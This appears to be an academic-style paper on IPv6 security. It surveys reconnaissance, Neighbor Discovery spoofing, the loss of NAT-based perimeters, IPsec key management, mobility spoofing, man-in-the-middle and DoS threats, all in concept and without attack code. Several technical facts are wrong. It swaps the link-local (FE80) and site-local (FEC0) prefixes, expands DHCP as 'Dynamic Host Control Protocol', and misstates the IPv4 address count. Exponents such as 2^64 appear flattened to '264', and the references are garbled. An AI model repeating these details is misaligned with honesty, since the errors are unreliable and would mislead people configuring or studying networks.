Chapter: 1 - Abstract
Since the initiation of the current generation of IP (Internet Protocol) version 4 in 1980, has been used for more than 20 years.IPv4 has supported the rapid growth of Internet during that time. This version of Internet Protocol (IPv4) has proven to be simple, easily implemented and robust. However, recently Internet has grown much larger than it was expected. Several problems such as configuration complexities, and poor security at the IP level, imminent exhaustion of the IPv4 address space, and poor QoS (Quality of Service) support for real-time delivery of data aeries due to this unpredictable growth. To address these and other issues, the Internet Engineering Task Force (IETF) has invented a set of protocols and Standards famous as IP (Internet Protocol) version 6 (IPv6). They introduced new features such as Auto- address configuration, Peer to Peer connectivity, mandatory support for security and mobility. These new features have proposed a great challenge on security issues for future networks based on this version of IP(IPv6). This paper examines security threats involving to the new features introduced in IPv6.
Key words: IPv4,IPv6, NAT, TCP/IP, IPSec, IKE, PKI , CGA
Business stakeholders and Internet experts usually agree that IPv6-based networks would be technically much superior to the generally installed IPv4-based networks. The immensely increased IP address space available under IPv6 could effectively stimulate a excess of new innovative communications services. The development of new classes of network applications (For e.g., widely available networked computing devices for monitoring, control, and repair in the home, the office, and industries) could result in rapid increases in demand for global IP addresses.
Gradually, this version of IP (IPv6) become (compared to IPv4) a more useful and flexible mechanism for providing user communications on a Peer to Peer basis. The enhanced capabilities and the redesigned header format of the new protocols in IPv6 could also makes the configuration and operation for certain networks and network services simple. These developments save operations cost and management cost for network administrators. Also, mobility and auto-configuration features of IPv6 could make it simple to connect computers with the Internet and easy network access for mobile Internet users. However, some new security concerns along with the new features are also need to be addressed. There are many groups in the world who are studying the security aspects in IPv6. The security threats of IPv6 are discussed in following sections. The security concerns for new features of Internet Protocol version are examined along with other inherit threats present in IPv4 based inter-network communication.
In second section, important features of IPv6 are outlined. In third sections, these outlined features are discussed in detail along with the security issues and current work going on to handle the threats. Forth Section highlights threats, which are common with IPv4 and IPv6. At last the paper is summarized with the features of IPv6, which are requiring for strengthening the security of network.
Five Key IPv6 Concepts .
Here are five keywords that will aid your understanding should you read IPv6 RFC (Request for comments) articles: Stateful and Stateless; Link-Local and Site-Local addresses, also ND (Neighbor Discovery)
A stateful IP address is one given by a DHCP(Dynamic Host Control Protocol) server. Usually DHCP describe more information than just the Internet Protocol address, As an example the IP address of the DNS (Domain Name Server) and default gateway.
"A stateless IP address is one that is automatically configured by router discovery." The node assigns itself an IPv6 address automatically unlike the IPv4.
Link-Local IPv6 addresses allow only those connections with neighbors on that subnet,these address start with FEC0 and are not forwarded by routers.
Site-Local address are routable, but not on the internet, thus nodes with Site-Local IPv6 addresses can use personal IP addresses, and can able connect to any other Site-Local address within the organization only. All Site-local address starts with FE80.
ND (Neighbor Discovery)
ND Replaces IPv4's ARP and ICMP Router Discovery mechenism. The idea is to discover information about their close by router. Moreover, if an IPv6 stack can get information about other nodes, then it will not duplicate, their IP addresses should need to use for Auto configuration.
Important Features of IPv6The addressing problem of
IPv4 was the prime motivation for generating newer version of IP (IPv6). However, along with this change the Internet Protocol has been updated in many other aspects as well to ensure its capability. Some of the important features of IPv6 are highlighted below:
Bigger Address Space
IPv6 has 16-byte (128 bits) long source and destination IP addresses compared to 4- byte (32 bits) for IPv4. Thus IPv6 provides 3.4 x 1038 addresses compared to 2.94 x 109 provided by IPv4. Globally over 1027 unique addresses to every individual on the earth can be made available in the year 2050 by the increased address apace.
Effective Management of Address Space
It was desired that IPv6 not only include more addresses, but also it should have efficient and speedy routing in our current network and the flexibility for the future network with a more efficient way of distributing the address space to provide better support for multicasting and broadcasting.
Better Support for Security
IPv4 was designed at a time when security was not a prime issue. But in today's world, security on the public Internet is a big concern, and the future success of the public network requires resolving those security concerns. IPSec is a compulsory feature in IPv6.
Easy TCP/IP Administration
The designers of IPv6 were expected to resolve the difficulties in configuring IP addresses in version 4. Though tools like DHCP (Dynamic Host Control Protocol) eliminate the need to manually configure hosts, it only partially solves the problem. Neighbor discovery protocols allow an IPv6 node to engage in stateless auto address configuration.
Better Support for Mobility
At the time of IPv4, there wasn't concept of Mobile IP devices. These problems are associated with computers (specifically notebooks) that travel between different networks lead to the need for Mobile IP. IPv6 builds on Mobile IP and provides mobility support within IP itself
Elimination of "Addressing Kludges"
Technologies like NAT (Network Address Translation) are effectively "kludges" that make up for the lack of address space in IPv4. IPv6 eliminates the requirements for NAT and similar work-around which allow every TCP/IP instruments to have a public address
Security issues relating to features of IPv6
Along with better network security there are lots of expectations about the features of the IPv6 protocol. IPv6 provides security at network level via its IPSec option. As this is an obvious improvement in security measure, still its universal usability is questionable. Moreover other features described above also bring new security threats. Below sections discuss those features and security issues arising due to them in detail.
Larger Address Space
In 1980, at the time when the IPv4 address space was designed, designers were never expected that it could be exhausted. However, because of changes in technology and an allocation practice at that time which did not expect the recent explosion of hosts (computers) on the Internet, in 1992 it was clear that a replacement for current version of IP would be needed. The 16-byte (128-bits) address will solve this address space issue for minimum 50 years in future even with the present growth of Internet.
The very first category of security attack related to the addresses is Reconnaissance, in this attack the attackers attempts to know as much as possible about the victim's network. Reconnaissance is carried out by methodologies called "Ping sweeps" and "Port scans". While in IPv4 this attack is comparatively easy because the range of subnet addresses in IPv4 are of hundreds or thousands. This task has made very difficult in the IPv6 because the subnet addresses on which "Port scans" are to be passed out are in the order of 264. As an example if the Port scanning rate were 1 million addresses per second, for the attacker it would take more than 500 thousand years to scan the whole subnet. Therefore the bigger address space is a restriction for Reconnaissance attack. Bigger address space can make the work of a malicious client tough, it may be obstruct with a countermeasure, The security scanners and IDS
Better Address Space Management
The fairly bigger size of the IPv6 address is designed to subdivided them into hierarchical routing domains which reflect the modern day internet topology. The usage of 128 bits for addressing allows multiple levels of hierarchy and flexibility of designing hierarchical addressing and routing which is the lacking behavior of the IPv4-based Internet Protocols. An IPv6 node or host and routers can have more than one multicast and unicast addresses. While the use of these address ranges is combined with the routing system, the network designer can able to limit access to IPv6 peer nodes through IPv6 addressing and routing system. For an instance, If the network designer assign global unicast addresses only to that node that needs to communicate with the global Internet while he assign site-local (having local scope) addresses to nodes that need to communicate only with the organization network. Similarly, if a node wants to communicate only within a particular subnet, then the link-local address is required. Moreover, the IPv6 privacy extensions also become a preventive factor for any single IPv6 address to be available and uncovered to a security threat.
The newer version of IP (IPv6) supports new multicast addresses that can enable the attacker to identify key resources present on a network and then attack them. These multicast addresses have a host, link, or site-specific domain of use defined in RFC 2375 .As an example, all routers (FF05::2) and all DHCP (Dynamic Host Control Protocol) servers (FF05::3) have address that are site-specific. Although this setup clearly has a lawful use, In effect of handing the attacker an official list of systems to further attack with simple SYN flooding attacks or something more sophisticated attack designed to challenge the device.
Eliminating NAT (Network Address Translation)
When IPv4 addresses were allocated for the Internet world wide it was passed out in such a manner that North America had sufficient and Europe and Asia had less addresses. When the address space shortage was realized a work around called Network Address Translation (NAT) was designed where NAT gateways modify the addresses in packets or datagrams and thus be able to hide a network behind every single official IPaddress. As NAT is promoting the reuse of the private address space, they are not supporting the standards-
NAT breaks peer to peer connectivity, so it has obvious drawbacks. As shown In figure
IPv6 does not support NAT Design. IPv6 with this 128 bit big address space IPv6 can offer peer to peer (End2End) connectivity to all hosts on the network. Even though this feature is a boon it's also has a bane at the same time from security concern. The current network makes use of NAT which provides a single entry point for networks and security mechanisms like Firewalls can be set up at entry point, describe in fig:1. Firewalls protect a not-so-secure point inside a network from the rest of the outer (big bad) world. At network Firewalls enforce uniform policy. It stops outsiders of network from performing dangerous task and provide a checkpoint which is scalable and having centralized control. Peer to Peer connectivity, encryption and tunneling may conflict with this policy. Traffic that Firewall cannot checked at can bring unpleasant operation to network nodes. With Peer to Peer connectivity, there will not be such security at entry point and the measure of security will lie only with the nodes. All nodes may not have the required computing resources for providing security.
Easy TCP/IP Administration
With the newer version of IP (IPv6),Address Resolution Protocols (ARP) is gone, and stateless auto- configuration as well as the "Neighbor Discovery" is built into ICMPv6 (Internet Control Message Protocol Version 6). The IPv6 Neighbor Discovery (ND) provide IPv6 hosts with a means to discover the presence and link-layer addresses of the other hosts on the local link. Moreover, it provides methodology for discovering router nodes available on the local link, for detecting when a host becomes unreachable, Also for resolving duplicate addresses and for routers to inform hosts when another router is more suitable (redirection).
Neighbor Discovery (ND) starts with a "Neighbor Solicitation" (NS) multicast query. Anyone can respond by Neighbor Advertisement (NA) to that query, as shown in fig:2. A malicious node can send Neighbor Advertisement and cause failure of Neighbor Discovery. Neighbor Discovery can be attacked in many ways by forging Neighbor Discovery packets. These packets can be interfere with Neighbor Discovery, which results in causing unreachability for certain hosts on the network. Fake response to DAD(Duplicate Address Detection ) can result in failed DAD, and can results into the failed auto-configuration. Spoofed router advertisements can divert traffic to the adversary to perform attacks like man-in-the-middle, etc, or to another host, results into the denial of service (DoS) by flooding.
Auto-Configuration allows any malicious host to get an IPv6 address without any authentication or administrative configuration, in that way, providing IPv6 access to any system with physical network access can be more efficient way. This implications of security are become serious sometimes because just getting on a LAN implies certain access rights, As an example, access to specific proprietary Applications.
The unique Neighbor Discovery Protocol (NDP) specifications called for the use of IPSec to protect NDP messages. However, the RFCs don't give detailed description for using IPsec option to do this. There is no simple architecture to for determine which neighbor hosts are authorized to respond. However, the way Neighbor Discovery operates; these kind of attacks can only be performed by hosts on the same network or network segment, which mitigates their effect. Operators of such networks, where hosts are not trusted, should apply some kind of protection for these attacks. There are currently some mechanism such as Secure Neighbor Discovery (SeND) which describe a methodology to counter the threats to Neighbor Discovery.
Better Support for Security
IPSec option is compulsory for IPv6 and it is definitely a security improvement in IPv6. IPSec option provides IP level authentication of the network packets and encryption of individual packets or traffic. The algorithms for encryption may be used in as a plug-in in the IPSec framework. Current IPSec implementations are better suited for tunneling operation (such as Virtual Private Network) than for arbitrary Peer to Peer communication. The reason behind this is the problem of encryption key management. Traffic protection with AH or ESP is not too efficient without key management mechanism. Manual key distribution mechanism does not scale well, therefore an automated system, i.e., IKE is needed. IKE has some limitations in that it is, as of now, a unicast UDP (User Datagram Protocol). For multicast and anycast message address, IKE is not useful.
We examine that, in fact, the IPv6 RFC says to use IPSec AH to protect ICMP version 6. The question is, "How?" To use IPSec option everyone needs a Security Association that depends on the address erudite through ND(Neighbor Discovery), security keys, a lifetime, and so on. If Security Associations are already established, how many are needed? These questions can be phrased as, "If one already has IPSec set up, then why discovery is needed?" Or "How Security Association can be already established to communicate securely with some node?"
Better Mobility Support
Mobility feature of IPv6 allows a mobile host to keep the same IP address visibility even when it moved to a foreign network from local network. This feature is included in IPv6.
Mobility is a complicated function of IPv6, involving many entities (mobile nodes, home agent etc.).Even the normal execution of mobility proposed several security questions, such as authentication and authorization of the mobile node in a foreign network. Because mobility uses option headers to save the "real" address of a mobile node, while using the "mobile" address stored in the IPv6 header, it may be involved into address spoofing attacks. By supplying wrong information to the home agent, lawful traffic may be diverted.
IPSec puts a secure channel between two secure end points. It is tough for a firewall between networks to do its operation if it does not understand the application or if it cannot able to parse the payload
IPv6 provides basic technology to prevent attacks like sniffing with IPSec option, but until the encryption key management issues are resolved, deployment of IPSec will be held up and sniffing will continue to be possible on the networks.
Man-in the middle attack
As in the case for IPv4, IPv6 is also victim to the same security risks proposed by a man in the middle attack in the IPSec protocol suite, more specifically IKE. There are tools that can attack an IKE aggressive mode negotiation and derive a already shared encryption key.
Attacks Application layer
Both IPv4 and IPv6 are susceptible to attacks at application layer. If Peer to Peer traffic is secured using IPSec option, firewalls or IDS tools are not able to provide security when it finds encrypted traffic. All security protections will be responsibility of the hosts.
IPv6 network is equally weak as IPv4 network for DoS attacks. Even Though definitely the increase in spoofed IP addresses may make flooding attacks more tricky to trace, the core principles of a flooding attack remain the same in both IPv6 and IPv4.
The attacker would be a malicious wireless access point, router, DHCP or DNS server, and switch. These attacks are fairly common in IPv4 networks and are not significantly changed in IPv6 also. If IPSec were ever used in a more broad way in the IPv6 protocol authentication for nodes could mitigate this attack.
To conclude, IPv6 has several new implemented features that have increase the network security. IPv6 does not provide fundamentally new security measures, but there are small enhancements, that, if used properly, can change the network security in a positive manner. As this version of IP is just born, it is still too early to tell, if IPv6 itself will enhance IP security. The IETF (Internet Engineering Task Force) is still working on IPv6 security measures issues such as ICMPv6, IPv6 firewalls, mobility, transition, etc. So on the long term we can expect IPv6 have a conceptually better security then IPv4 has since 1980
- Differences Between IPv4 and IPv6 Addresses. (n.d.). Retrieved May 12, 2010, from http://www.computerperformance.co.uk: http://www.computerperformance.co.uk/Longhorn/ipv6.htm
- DRAGO ZAGAR, F. O. (2006ary). IPv6SECURITYTHREATS AND POSSIBLESOLUTIONS.
- IPv6SECURITYTHREATS AND POSSIBLESOLUTIONS.